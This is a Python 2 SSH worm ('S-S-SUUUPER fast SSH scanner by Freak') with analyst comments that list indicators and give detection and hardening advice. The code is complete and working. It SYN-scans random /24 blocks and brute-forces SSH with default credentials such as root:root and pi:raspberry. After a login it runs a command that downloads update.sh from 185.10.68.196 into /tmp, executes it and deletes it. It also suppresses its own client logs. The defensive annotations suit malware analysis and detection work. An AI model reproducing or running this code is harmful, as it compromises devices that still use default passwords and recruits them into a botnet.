# Analyst annotations for a credential-guessing SSH spreader (Python 2 syntax:
# print statements, raw_input, xrange). Line breaks and indentation were
# reconstructed from a collapsed paste; the code tokens are unchanged.
#
# Behaviour visible in this file:
#   1. Scanner threads send bare TCP SYNs (source port 1337, destination
#      port 23) to every address of randomly chosen /24 blocks.
#   2. A sniffer thread matches replies with TCP flags == 18 (SYN+ACK) coming
#      from port 23 back to port 1337.
#   3. Each responder gets a thread that tries SSH password logins on port 22
#      from the built-in username:password list.
#   4. After a successful login the pair is appended to vulnz.txt and one
#      shell command is run on the remote host (see rekdevice).
#
# Indicators present in this file:
#   - 185.10.68[.]196, path /update.sh, fetched into /tmp and run with sh
#   - fixed TCP source port 1337 on the SYN probes
#   - local output file vulnz.txt
#
# Detection / hardening notes:
#   - Network: bursts of SYNs with source port 1337 towards port 23 across
#     whole /24s; one source cycling default usernames against sshd.
#   - Host: an SSH session that immediately runs wget or busybox wget into
#     /tmp, then chmod 777, sh and rm -f on the same file.
#   - Every entry in the password list is a factory or default credential;
#     key-only SSH authentication or changed defaults makes step 3 fail.
import logging
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Disable the annoying No Route found warning !
import sys, re, os, paramiko, socket, random, itertools
from threading import Thread
from time import sleep

# Paramiko's own log is routed to /dev/null, so the scanning host keeps no
# client-side record of the connection attempts.
paramiko.util.log_to_file("/dev/null")

# Command executed on a host after a successful login: fetch update.sh over
# plain HTTP (wget, then busybox wget), mark it 777, run it with sh, delete it.
# The script is removed afterwards, so look for the process tree and the HTTP
# request rather than the file on disk.
rekdevice="cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send

print "S-S-SUUUPER fast SSH scanner by Freak"
print
# Number of scanner threads, read interactively from the operator.
maxthreads = int(raw_input("Threads: "))

# `global` at module level has no effect; fh is simply a module-level name.
global fh
# Successful "user:password:ip" triples are appended here.
fh = open("vulnz.txt","a+")

global passwords
# Candidate "username:password" pairs, tried in order against each responder.
# "default:" carries an empty password.
passwords = [
    "root:root",
    "root:admin",
    "root:password",
    "root:default",
    "root:toor",
    "admin:admin",
    "admin:1234",
    "ubnt:ubnt",
    "vagrant:vagrant",
    "root:ubnt",
    "telnet:telnet",
    "guest:guest",
    "root:vagrant",
    "pi:raspberry",
    "default:",
    "admin:password",
    "cisco:cisco",
    "root:5up",
    "user:password",
    "user:user",
    "root:debian",
    "root:alpine",
    "root:ceadmin",
    "root:indigo",
    "root:linux",
    "root:rootpasswd",
    "root:timeserver"
]


# Try each credential pair against IP over SSH (port 22, 3-second timeout) and
# stop after the first success. The parameter name IP shadows scapy's IP class
# inside this function only.
def SSHBrute(IP):
    global fh
    global passwords
    cracked = False
    for passwd in passwords:
        if cracked: return
        try:
            ssh = paramiko.SSHClient()
            # AutoAddPolicy accepts whatever host key the server presents.
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(IP, port = 22, username=passwd.split(":")[0], password=passwd.split(":")[1], key_filename=None, timeout=3)
            print "Freaks next root ->"+ passwd + ":" + IP
            cracked = True
            # Record the working pair, then run the download-and-execute command.
            fh.write(passwd + ":" + IP + "\n")
            fh.flush()
            ssh.exec_command(rekdevice)
            # Session is held open for 20 s before closing, presumably to let
            # the remote command finish (assumption, not shown here).
            sleep(20)
            ssh.close()
        except Exception as e:
            # Every failure (auth, timeout, refused connection) is silently
            # dropped; the target's sshd log still records each failed login.
            pass


# Sniffer callback: for a packet with TCP flags == 18 (SYN+ACK) and a source
# address, start an SSHBrute thread against that source.
def cook(pkt):
    try:
        global fh
        if pkt[TCP].flags == 18 and pkt[IP].src:
            # The message says port 22, but the capture filter in sniffer()
            # matches replies from port 23.
            print "22 port opened: %s " % (pkt[IP].src)
            threadstarted = False
            # Retry until a thread could be created.
            while not threadstarted:
                try:
                    Thread(target = SSHBrute, args = (pkt[IP].src,)).start()
                    threadstarted = True
                except:
                    pass
                    # NOTE(review): nesting of this sleep is not recoverable
                    # from the collapsed source; it is placed in the except
                    # branch here.
                    sleep(1)
    except Exception as e:
        pass


# Capture loop: only TCP packets addressed to local port 1337 that come from
# remote port 23 reach cook().
def sniffer():
    sniff(filter="tcp and dst port 1337 and src port 23", prn=cook)


# Build a random target block "a.b.c.0-255": the first octet comes from a
# fixed list, the second and third are each drawn from 1..255.
def gen_IP_block():
    first = random.choice(["2", "5", "31", "37", "46", "94", "95",
        "118", "119", "122", "161", "168", "176", "178", "179", "180", "183", "185", "187", "188", "191", "198", "201"])
    ip = ".".join([str(first),str(random.randrange(1,256)), str(random.randrange(1,256))])
    return ip+".0-255"


# Expand a dotted string whose octets may be "lo-hi" ranges and send one SYN
# (source port 1337, destination port 23) to every resulting address through a
# layer-3 socket bound to eth0. No reply is read here; answers are picked up
# by sniffer(). The timeout parameter is not referenced in the body.
def ip_range(input_string, timeout=0.2):
    octets = input_string.split('.')
    chunks = [map(int, octet.split('-')) for octet in octets]
    ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
    s = conf.L3socket(iface='eth0')
    for address in itertools.product(*ranges):
        address ='.'.join(map(str, address))
        pkt = IP()/TCP(sport=1337, dport=23, flags="S")
        pkt[IP].dst = address
        s.send(pkt)


# Scanner worker: probes one random /24 after another, without end.
def HaxThread():
    while 1:
        ip_range(gen_IP_block())


# Start the reply sniffer first, then the requested number of scanner threads.
Thread(target = sniffer, args = ()).start()
global threads
threads = 0
for i in xrange(0,maxthreads):
    try:
        Thread(target = HaxThread, args = ()).start()
        threads += 1
    except Exception as e:
        pass

print "Started " + str(threads) + " scanner threads! Press enter to stop."
raw_input()
# Signal 9 to the process itself ends all threads at once.
os.kill(os.getpid(), 9)